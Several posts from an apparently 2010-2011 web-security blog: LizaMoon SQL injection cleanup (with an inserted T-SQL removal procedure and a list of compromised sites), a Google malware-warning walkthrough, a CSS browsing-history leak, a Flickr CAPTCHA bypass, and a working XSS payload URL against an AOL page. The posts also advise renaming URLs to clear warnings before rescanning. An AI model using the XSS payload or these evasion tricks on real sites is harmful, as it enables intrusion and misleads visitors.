
Monday, May 16, 2011

What it looks like if Google detects an exploit on your domain

I recently did a post on the LizaMoon SQL injection attack, and one of the cool things about it was that Google detected the attack, showed where it was living on the domain and processed the reconsideration request very promptly.

When you log in to Google Webmaster Tools and Google has detected a malicious script or exploit on your domain, it shows you a red alert warning you of the infection.

When you click through to the "Malware" section under "Diagnostics" in WMT you get a list of infected URLs, what the malicious script looks like and the date it was found. Google notices that the same script is repeated numerous times on the page and assumes the site's database tables are infected.
After you have gone and cleaned everything up, and hopefully closed any of the SQL injection holes the attackers' crawler found, you can tell Google to stop showing that giant red warning to people visiting the pages that were infected.
The alert seems to be generated automatically, so I'm pretty sure it reruns the automated scan that detected the problem in the first place. But based on the response time I'm going to say there is no human verification of the removal of the malicious code.

One thing to note while you are working on getting it clean is that the big red warnings that try to send users away are created at a URL or folder level, so by renaming files you can make the warning go away even before Google's security bot has checked for infection again.

The easiest way to do the renaming would probably be to use the .htaccess file to rewrite the URL to a new name and add a canonical tag to the page.

Tuesday, March 29, 2011

The LizaMoon SQL Injection Attack

OK, so I ran into this SQL injection attack today and I wanted to throw up some info on how to clean your database, what the code probably looked like and what you need to do to protect yourself in the future. This is the little code snippet that is injected into all the string columns in the database. You can see how they use the </title> to try to jump out of the title tag (if a column is the title tag) so the script is run in the head. It also doesn't check for previous infections, so on some sites you can see it strung two or three times.
Based on what I've seen and found, I'm going to take an educated guess and say that this is a hacker's spider that has been designed to look for fingerprints of exploitable code and automate the hacking. Doing a Google search for the string it drops, you can find pages of results that have been compromised. Here are some of the victims of the attack:
  • http://www.cmobjects.com/default.asp?ID=09984D98CB604C0B8A69566F9145173E
  • http://www.cheerextreme.com/toast/toast.asp
  • http://www.ybm.org.il/hebrew/Article.aspx?Item=1139
And not only that, there aren't many people talking about it... apparently it made it to iTunes at some point and other people have mentioned it on forums, so who knows how many domains have been affected. I'll update this soon with a removal stored procedure... I forgot the code at the office.
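The removal procedure the post promises is not on this page, so here is an added T-SQL example (not the author's code) that strips one known injected string from every string column of every table in a SQL Server database. The injected tag is passed in as @Injected, a placeholder you fill with the exact string found in your tables; it assumes SQL Server 2008 or later and that you have taken a backup first.

```sql
-- Added example, not the post's own procedure: remove one known injected
-- string from every string column of every base table in the current
-- database. @Injected is a placeholder for the exact <script> tag found.
CREATE PROCEDURE dbo.RemoveInjectedString
    @Injected NVARCHAR(4000)
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @Schema SYSNAME, @Table SYSNAME, @Column SYSNAME;
    DECLARE @Sql NVARCHAR(MAX), @Rows INT, @Total INT;
    SET @Total = 0;
    -- The attack writes into every string column it can reach, so the
    -- cleanup walks all of them rather than a hand-picked list.
    -- Computed columns are skipped because they cannot be updated.
    DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
        SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
        FROM INFORMATION_SCHEMA.COLUMNS AS c
        JOIN INFORMATION_SCHEMA.TABLES AS t
          ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
        WHERE t.TABLE_TYPE = 'BASE TABLE'
          AND c.DATA_TYPE IN ('char','varchar','nchar','nvarchar','text','ntext')
          AND COLUMNPROPERTY(OBJECT_ID(QUOTENAME(c.TABLE_SCHEMA) + '.'
                + QUOTENAME(c.TABLE_NAME)), c.COLUMN_NAME, 'IsComputed') = 0;
    OPEN cols;
    FETCH NEXT FROM cols INTO @Schema, @Table, @Column;
    WHILE @@FETCH_STATUS = 0
    BEGIN
        -- REPLACE removes every occurrence, so a column hit two or three
        -- times is cleaned in one pass. text/ntext are cast because REPLACE
        -- does not accept them; the value converts back on assignment.
        -- CHARINDEX rather than LIKE, so '%' or '_' in the tag stay literal.
        SET @Sql = N'UPDATE ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
            + N' SET ' + QUOTENAME(@Column) + N' = REPLACE(CAST('
            + QUOTENAME(@Column) + N' AS NVARCHAR(MAX)), @p, N'''')'
            + N' WHERE CHARINDEX(@p, CAST(' + QUOTENAME(@Column)
            + N' AS NVARCHAR(MAX))) > 0; SET @r = @@ROWCOUNT;';
        EXEC sp_executesql @Sql, N'@p NVARCHAR(4000), @r INT OUTPUT',
            @p = @Injected, @r = @Rows OUTPUT;
        IF @Rows > 0
            PRINT QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table) + N'.'
                + QUOTENAME(@Column) + N': ' + CAST(@Rows AS NVARCHAR(12)) + N' rows';
        SET @Total = @Total + @Rows;
        FETCH NEXT FROM cols INTO @Schema, @Table, @Column;
    END;
    CLOSE cols; DEALLOCATE cols;
    PRINT N'Rows cleaned: ' + CAST(@Total AS NVARCHAR(12));
END;
GO
```

Run it as `EXEC dbo.RemoveInjectedString N'<the exact injected tag>';` and repeat with each variant you find. Cleaning the data only removes the symptom; the page that let the crawler in still has to be fixed by parameterizing its queries, or the spider will simply re-infect the tables.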

Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Here's my video about exploiting cross-site scripting attacks in the wild. I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 minutes.

See the attack and video live on the page

or watch below (I'll keep this link live as long as it works)

The JavaScript we inject is shown below

which URL-encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see my copy, it is here: AOL XSS attack landing page. If you are having issues with XSS attacks on your domain or would like help securing your application, contact me; I'd love to help.

P.S. The tool I used to do the string encoding is here.

Friday, April 2, 2010

OK so what is Start Panic! and do we need to be?

OK so what is Start Panic!

Basically all it does is enumerate your browsing history... but that's a lot. Everything we do now is online, and we use all those sites to do everything from our banking to our social networking. First I want to quickly cover why this information should be kept secret, and then explain exactly how they are getting to it.

On its own this is hardly a problem: aside from some embarrassing browsing history, there isn't a lot you can do with the history you steal. But combined with the classics (social engineering, weak passwords and phishing) you could be in a lot of trouble. It happened to Twitter just recently and it can happen to you. People can guess security questions based on your social networking responses; "where did you first go to school" or "what's your pet's name" are no longer hard to find, and your browsing history will tell them exactly where they can find your profiles. With some basic info on you and a crafty email, many would fall for a phishing scam, and from there they can get even more.

61% of passwords are reused for all sites (1), and that means if one of your online profiles is lost they are all in danger, especially if it's your webmail account: they can just have the sites reset your passwords for them. Yahoo has taken one of the first measures against this by having multiple security questions and the ability to reset your password with your cell, but many sites still don't offer this service.

But enough with the scare tactics; let's look at exactly how this attack is conducted and how some simple functionality gave the attacker the keys to the kingdom.

CSS is the new way to style text on the web, and it's responsible for much of the explosion in design creativity, but it can also leak important info (such as your browsing history).
Consider this CSS:

Now any link will only display if it has been visited. They write a large number of links to the page, to common sites like Facebook or your bank, and it's a simple task to write some JavaScript to check which links on the page are displayed. That's it: they have your browsing history (and know what sites you use and where you bank online).

There is no way to prevent this attack. It is still possible to perform it with no JavaScript (it involves a server-side script and requests to the server for images), but that variant is uncommon and unreliable. So watch out and clear your history, because you don't know who's reading it as you pass by on the world wide web.

1) http://www.readwriteweb.com/archives/majority_use_same_password.php

Sunday, March 28, 2010

An attack on a Flickr based photo Captcha

The other day I was minding my own business running around the internet when I came across a blog with an awesome picture CAPTCHA... I wanted to know how it was done and took a peek at where the image was served from... Flickr!



So how would I have created this service? Tags on the images from the API... so if we can find the photo used, then we can reverse the process and break the CAPTCHA...

Well, lucky us, there's an API that does exactly what we need... the URLs for the images look like this:
http://farm4.static.flickr.com/3503/3836827765_2d7f39811d_s.jpg

The first number is the picture ID and the second is the secret... we pass these to flickr.photos.getInfo (documentation) and get back exactly what we need... the picture's info and the tags associated with it...

I've wired this up so it will pull a random test from the CAPTCHA's server and, boom, we can not only break the system but bypass it... this will return the answer every time :)

So just to be clear, this page is actually breaking a CAPTCHA each time it loads... it's pulling the remote CAPTCHA, parsing the results and sending off requests to Flickr to pull the tags for each image detected (all in JavaScript)... the green borders represent the images it has detected as answers to the CAPTCHA.

The code that gets displayed must be viewed on the original post.


I actually really liked using this CAPTCHA; it went much faster than other ones, but the problem is I was able to reverse the process of image selection and break it... I knew this wasn't the first Flickr-based system I had heard of, so I went out and found another one, but it was protected... it proxies the image through a PHP script on the blog to hide the original Flickr URL and prevent my attack from working...

This WordPress plugin has a few thousand users and I was able to bypass the test in just a couple of minutes. This just further proves the idea that security is hard, because you have to fix every hole in the system and the hacker only has to find one.